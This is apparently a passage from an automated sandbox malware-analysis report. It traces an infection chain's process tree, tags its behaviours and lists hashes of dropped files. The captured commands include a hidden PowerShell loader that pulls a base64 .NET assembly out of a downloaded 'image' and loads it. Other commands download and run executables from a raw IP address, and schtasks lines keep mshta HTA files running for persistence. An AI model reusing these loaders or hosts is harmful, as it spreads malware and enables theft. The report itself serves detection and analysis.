                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2276
                                • C:\Users\Admin\AppData\Local\Temp\1072399001\dDFw6mJ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072399001\dDFw6mJ.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  PID:1768
                                  • C:\Windows\SYSTEM32\cmd.exe
                                    cmd.exe /c 67a27a89a5061.vbs
                                    7⤵
                                    • Checks computer location settings
                                    • Modifies registry class
                                    PID:3088
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs"
                                      8⤵
                                      • Checks computer location settings
                                      PID:2960
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5008
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                          10⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4308
                                • C:\Users\Admin\AppData\Local\Temp\1072400101\bb53b2706a.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072400101\bb53b2706a.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:4160
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c schtasks /create /tn 6LQBvmarfz5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta" /sc minute /mo 25 /ru "Admin" /f
                                    7⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3208
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /create /tn 6LQBvmarfz5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta" /sc minute /mo 25 /ru "Admin" /f
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2168
                                  • C:\Windows\SysWOW64\mshta.exe
                                    mshta C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta
                                    7⤵
                                    • Checks computer location settings
                                    • System Location Discovery: System Language Discovery
                                    PID:4444
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                      8⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Downloads MZ/PE file
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3916
                                      • C:\Users\Admin\AppData\Local\TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE
                                        "C:\Users\Admin\AppData\Local\TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE"
                                        9⤵
                                        • Modifies Windows Defender DisableAntiSpyware settings
                                        • Modifies Windows Defender Real-time Protection settings
                                        • Modifies Windows Defender TamperProtection settings
                                        • Modifies Windows Defender notification settings
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Windows security modification
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3620
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1072401021\am_no.cmd" "
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2616
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1072401021\am_no.cmd" any_word
                                    7⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3180
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 2
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      • Delays execution with timeout.exe
                                      PID:4936
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2844
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2060
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1788
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2852
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3340
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1464
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /create /tn "Lnzbxma67Tp" /tr "mshta \"C:\Temp\zRGpbMfKW.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4160
                                    • C:\Windows\SysWOW64\mshta.exe
                                      mshta "C:\Temp\zRGpbMfKW.hta"
                                      8⤵
                                      • Checks computer location settings
                                      • System Location Discovery: System Language Discovery
                                      PID:2172
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Downloads MZ/PE file
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1912
                                        • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                          "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                          10⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          PID:1736
                                • C:\Users\Admin\AppData\Local\Temp\1072402001\Fe36XBk.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072402001\Fe36XBk.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Writes to the Master Boot Record (MBR)
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:2704
                                • C:\Users\Admin\AppData\Local\Temp\1072411001\dda6de0d95.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072411001\dda6de0d95.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:3640
                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NkM0ODlEQUItRDM3NC00NzVDLTlDOTctOEQ0Q0YxQUZFNjZFfSIgdXNlcmlkPSJ7MTZGREIyMTYtQzZBNy00RjU0LTk5QUQtRTFBQkNEMEY4Rjg1fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7ODY2MzMxMkMtODNCNS00NjE2LThGOTItMEFEMkNFQkU1QjdBfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDY4ODkiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTM2NTgwOTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MDM0MjA1NzI1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                        1⤵
                        • System Location Discovery: System Language Discovery
                        • System Network Configuration Discovery: Internet Connection Discovery
                        PID:1708
                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                        1⤵
                          PID:3340
                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          1⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1876
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                          1⤵
                            PID:976

                          Network

                          MITRE ATT&CK Enterprise v15

                          Downloads

                          • C:\Temp\zRGpbMfKW.hta
                            Filesize: 782B
                            MD5: 16d76e35baeb05bc069a12dce9da83f9
                            SHA1: f419fd74265369666595c7ce7823ef75b40b2768
                            SHA256: 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
                            SHA512: 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

                          • C:\Users\Admin:.repos
                            Filesize: 1.2MB
                            MD5: 12c676ce651cc131804839aefecab260
                            SHA1: e6bbacc97bb925a2eecbfea4d2aaa191ef08ac00
                            SHA256: 0daf04d613cc238c00809eaedbd92155fd4a9d20cc9b3a81207ae582df4d6afe
                            SHA512: 2acabffd10d2cd8ac7451cdfe6f0b4f1b3e5e17f033ef3029cd2f7978d040deb1ad70144a5b099f8db0c4547221dd81590d0c3712c3a3e8cf8d806dab97f7806

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                            Filesize: 2B
                            MD5: d751713988987e9331980363e24189ce
                            SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
                            SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
                            SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
                            Filesize: 14B
                            MD5: ef48733031b712ca7027624fff3ab208
                            SHA1: da4f3812e6afc4b90d2185f4709dfbb6b47714fa
                            SHA256: c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99
                            SHA512: ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                            Filesize: 126KB
                            MD5: 2f396541c1d69290fe92fc5074796a69
                            SHA1: efb9cf0760a11f8bd181cde7142d65c390d1828a
                            SHA256: 8f2a4735f15ae53c78f4f5e988db0a5b6ab5c40d7f5dbb9628ae977a4f8e55b8
                            SHA512: 69f3283e064a9fbb95b7270178e5d41f18ccb3a3531774b060489921e2326f39880bad7d0fad3a1c39abc5371d9a5a5c02147ab5eff1860df9354f0571260d64

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                            Filesize: 2KB
                            MD5: 25604a2821749d30ca35877a7669dff9
                            SHA1: 49c624275363c7b6768452db6868f8100aa967be
                            SHA256: 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
                            SHA512: 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                            Filesize: 152B
                            MD5: 75fc6fd984687a3b60604f8385d2d3ee
                            SHA1: 47ca2cd71dfbddaf9fbdec9f9b4940d465bd40e9
                            SHA256: 7f3c92d21167647ec0b45c9ed1163abd9a8d9199bc1d715edd58440ea1adc6ab
                            SHA512: cdeaa85deccb8ade6e361b47ee47a2fcf687f91e6105d2b250d6239eaefaaf40ce1f612dfcff132ade8bc497f9527429757ebf477092c8e10b16c6426971214a

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                            Filesize: 152B
                            MD5: d93f6e4c57710d309e3397e058ad78f3
                            SHA1: 0fbea33aed97992a22327797ad102e419b37e9cc
                            SHA256: 3439987ffec3d9feb7a8943beb481ee0259199882b66b863fe70c9f7ecbc21c3
                            SHA512: 2449fb3826e493fec6304cf48ccab992653be05799467c85f4327feb6446c4109057d08f57fd57a3c342ace8e3c74c887ce9a21112c25a8efbff7fe0ad5c757f

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                            Filesize: 6KB
                            MD5: c2cae108488044950f84bd30465e9607
                            SHA1: 96f3898da34c965323d093b557cd54c5bf56ed8a
                            SHA256: b7c5bd3f1003ea2c6d22003f8f85050735cfb4ea8fe9148c3385fbc812422548
                            SHA512: e93ed4391ee6b79bbdb4dd02f942278b0d6b9bf92daf9e56a1b41e760a4fbb0e12c791ff9ad827d4a199417fb488ee5943b49db8dd0f76fedd8a361239735cb2

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
                            Filesize: 11B
                            MD5: 838a7b32aefb618130392bc7d006aa2e
                            SHA1: 5159e0f18c9e68f0e75e2239875aa994847b8290
                            SHA256: ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
                            SHA512: 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                            Filesize: 53KB
                            MD5: 3337d66209faa998d52d781d0ff2d804
                            SHA1: 6594b85a70f998f79f43cdf1ca56137997534156
                            SHA256: 9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
                            SHA512: 8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                            Filesize: 19KB
                            MD5: 9aacc03c8d1aef1f55a5b6a61312e2cc
                            SHA1: 16a64b6682f611fea77bb0502603df3cd011d76e
                            SHA256: a7b7592f16da4aa14a13869ca0bea858d133c3fae107518c2906877dea3fa64b
                            SHA512: e284065925b9a3b521d9a4175d27084617ee7e0082b812ca4df299a6772e25f349df454a848dc2b02e4998400f2cd6baa5c60c918d4e7a2ea2f942585f081f64

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize: 20KB

                            MD5

                            72437413a6bab0b952520e4850ccb0d6

                            SHA1

                            0530f3a07d12956b6fb0aa640a3ed2072380503b

                            SHA256

                            71e9ff151b461ed6365c487077bcaa078ab5597bb8a5899624b930bbee8c9748

                            SHA512

                            f69ef094ae5d330a2fb6ecb4d1338efc0594e37d4c51b35b90eb44d51001532f83ffd2c3d8cb131332974ab82467dd75a1c0dedb53df8c52bfb0f5042d28b2e1

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            16KB

                            MD5

                            814252d15e71bb5b71521da89506a13e

                            SHA1

                            aa578d3f6f302298a35b2bbd5dd5204fba7eaeb7

                            SHA256

                            b93398610e457e5fa3e6066eaf594573eedf7a5a90ba38eb50b065f6891e24c4

                            SHA512

                            7533d72b780e55581494c641cb70332a4e5aed5e0d5e3ccfa6a866131ae8d15626fbf79d7ca3c46c0beea40fd07bd5720d1b7dbd80a721ec250481c9aa1d05c6

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            16KB

                            MD5

                            8f108e274182cc2e4d04dd1b4cc7b62a

                            SHA1

                            ba63c32a671a32e599927e12c968dee54326aa60

                            SHA256

                            3a1bcf1a20e14c40de6ec98365985095ab2b87d119cf9021e3e1ac9ad81c63a4

                            SHA512

                            506a8a3037e72e981c56fe9017344ed0d07b5389c8b3ee03b2b883c837c61d0458e1b8976ccc226b9aad526981fc42f91acfffc3b959f5675228c9336237c18d

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            16KB

                            MD5

                            d0a6611bd43cd4394e9340a81c8ec589

                            SHA1

                            41d5c5ba667e8e9005d98081b9893bb0be84a757

                            SHA256

                            0ae7f6bac5406b37146773ecad3848d9f634baa44462c1a92235bce89720a118

                            SHA512

                            b69894b49658a0b0472510313708a001b7d2242ec06ff43a10fb818823eb2a933225f4640f4b6d2e577c17e328593b3c60e8488bd8ecc680b4d1c91185617d1d

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            16KB

                            MD5

                            28429b7349755c17d2d231250724277e

                            SHA1

                            20b66d0a0246878860b2461e7485e1e72d695930

                            SHA256

                            de96b3d155ad8d4333e9365c1eee37105595c50148c126c6a2a2f7c58157c26b

                            SHA512

                            2d8dc160306590dbdb9d9f365b0306c38b8678be27a5d031e2f5db0730b06271c9bfc00675cb7729ee13ecf99914a248973aa05f2258590e305e14a84557392b

                          • C:\Users\Admin\AppData\Local\TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE

                            Filesize

                            2.0MB

                            MD5

                            5b0a7fc38aabac34a16d0b7739a5920f

                            SHA1

                            247eca5db3c002ff17728a0ec84b8df3931b0924

                            SHA256

                            31fa3a682cac17998ecd8a575f58916e5d6fa26d5eec61f71af4898f5849717e

                            SHA512

                            0bb20421a6fe1a1ed30f1d0cd3275ca1ad229d77fe76a0e14c03a986c05a592364ef9ea5660f01e2b136ba90874985f5c9731ad6218648e56d4aba32c70e5abe

                          • C:\Users\Admin\AppData\Local\TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE

                            Filesize

                            2.6MB

                            MD5

                            8347d9850212e4c873066599739fddaf

                            SHA1

                            275b7bd3dcdee6c5d4ea9784e1029bc3ef64d0b8

                            SHA256

                            1966533f96c47dd8f25757658a069429e68a370c2c5af62065f8d90acd5353dc

                            SHA512

                            3eb06d7f48b99b14105cb739aaa651c22fcdb58338cde6b6e555249fa48a731f16d70801577a279817bf740dbf58a8750510165e96f448d88edfffec2303eae2

                          • C:\Users\Admin\AppData\Local\Temp\1072393041\b6V4Rod.ps1

                            Filesize

                            880KB

                            MD5

                            1c611166768934709414e86420907d9e

                            SHA1

                            6f2d29019332f417f2c36e09adc68dade71fa71a

                            SHA256

                            18cb8d4b430b8c6f45e050534e73d8c914f1e0be92a33270b87796f5bd217205

                            SHA512

                            be1c3a69440f2c7d2aacae4449f92888c427daec3420a56554daeea30e0750bb048fa95ce4c3b1dd4eb56abfd3a52862f7106f361a8b91eb9c1aa6350bd78d45

                          • C:\Users\Admin\AppData\Local\Temp\1072397001\Bjkm5hE.exe

                            Filesize

                            1.7MB

                            MD5

                            0f2e0a4daa819b94536f513d8bb3bfe2

                            SHA1

                            4f73cec6761d425000a5586a7325378148d67861

                            SHA256

                            8afc16be658f69754cc0654864ffed46c97a7558db0c39e0f2d5b870c1ff6e39

                            SHA512

                            80a35414c2be58deec0f3382a8e949a979f67d4f02c2700cf0da4b857cdcc8daa6b00ce2bcc3864edb87446086fe3f547a60580449935dbad5fb5f08dda69f1b

                          • C:\Users\Admin\AppData\Local\Temp\1072398001\7fOMOTQ.exe

                            Filesize

                            2.0MB

                            MD5

                            b348884fc13a1a86e9e3a38a647ccd24

                            SHA1

                            98a1579a9bd8cdc22a0e67a8abc65ceaa437aeed

                            SHA256

                            6fe6353ce95442b04be3391b5ca97532d67ce99201a1f5ee90bd687eb6db09b9

                            SHA512

                            cd990195510f0785e163ddd4bc0138ca94aacf8322bcd693fd8467e411bad8bd5f01b0060693ebd3c1bccd56ad926076623018147ebffa6df03db5b20b9a27d9

                          • C:\Users\Admin\AppData\Local\Temp\1072399001\dDFw6mJ.exe

                            Filesize

                            159KB

                            MD5

                            ddbac4a2e8251285d482ae1d2c1b6a58

                            SHA1

                            980107fdd7932e1d8ee5148f0a2d47b2547d4ab9

                            SHA256

                            3993cc8ef308c5d3652217e4823bda8a95db5a746abe6508b78efd978e43176d

                            SHA512

                            d3b6e8b79e8602f31b8bb6e1d85bdaeca08a376c1adff4b875a77146d12a1bf3460bc406c2384597174d015900234f146cade54783fd8b90dc8d2f81199a14d5

                          • C:\Users\Admin\AppData\Local\Temp\1072400101\bb53b2706a.exe

                            Filesize

                            938KB

                            MD5

                            a04c0fd2701364fea3c1d2b50dd3a041

                            SHA1

                            82899868e0009ddbcdfab7da2af4fb72540b693b

                            SHA256

                            8be0c55a0c38116be40362d38c4fe5c482a054bb4f89905490fff9270015fa94

                            SHA512

                            4a8d567741a56f017461cf34a7ac213b52ae389aeab9fe57d03238dd28f27c4ab48715dfaf69b210f50a13e86ddec6318716c18c98a96e038cf881b63574e262

                          • C:\Users\Admin\AppData\Local\Temp\1072401021\am_no.cmd

                            Filesize

                            2KB

                            MD5

                            189e4eefd73896e80f64b8ef8f73fef0

                            SHA1

                            efab18a8e2a33593049775958b05b95b0bb7d8e4

                            SHA256

                            598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396

                            SHA512

                            be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

                          • C:\Users\Admin\AppData\Local\Temp\1072402001\Fe36XBk.exe

                            Filesize

                            2.1MB

                            MD5

                            b1209205d9a5af39794bdd27e98134ef

                            SHA1

                            1528163817f6df4c971143a1025d9e89d83f4c3d

                            SHA256

                            8d7b5e82a483a74267934b095f8f817bdc8b9524dffdd8cc5e343eca792264bd

                            SHA512

                            49aa4fcbfded0c155922fe25efce847882b980c8a08d9b78c1a67cc3eb90449e7c8fbafc3420b63725f60ece9bd9c563904387052ae2d457cabeaa384a2e9bf8

                          • C:\Users\Admin\AppData\Local\Temp\1072411001\dda6de0d95.exe

                            Filesize

                            325KB

                            MD5

                            f071beebff0bcff843395dc61a8d53c8

                            SHA1

                            82444a2bba58b07cb8e74a28b4b0f715500749b2

                            SHA256

                            0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec

                            SHA512

                            1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d

                          • C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta

                            Filesize

                            720B

                            MD5

                            40e4b0edc948370f55b90738fe1864a0

                            SHA1

                            c49ec3a019e62146862faffdb9ab2e4aad7eb6cb

                            SHA256

                            744e34c07567eaa047b8e3eb8ee81026f49ac17bedc8e0ecfe3912b31353abdc

                            SHA512

                            c371a62b291878006c56a1525dffa5b3176e29adf79abac01dddce02791052aa1c99f2e7ab22db5bf6b430f4f10bdea15ed43a466f27c85dbbaf0d57210a6c67

                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs

                            Filesize

                            14KB

                            MD5

                            1fdae75b6c2be77b881599fe27abacca

                            SHA1

                            820b5b894c87cf8f49c6acedee0c228e22b71881

                            SHA256

                            d9b7a84e31aac11d2f82a2108e33bde5f5b6ae304414667fa7a505e3b8588180

                            SHA512

                            241d8e4cb4620d32d2483cfb7a5f1b2b8a418c8c19d6f1ff4f40555a799f93b8b0c8f2cfefd89b3ea98a42da3121a48dc8ddfcc47d7c3228966efcdd1ebaef0f

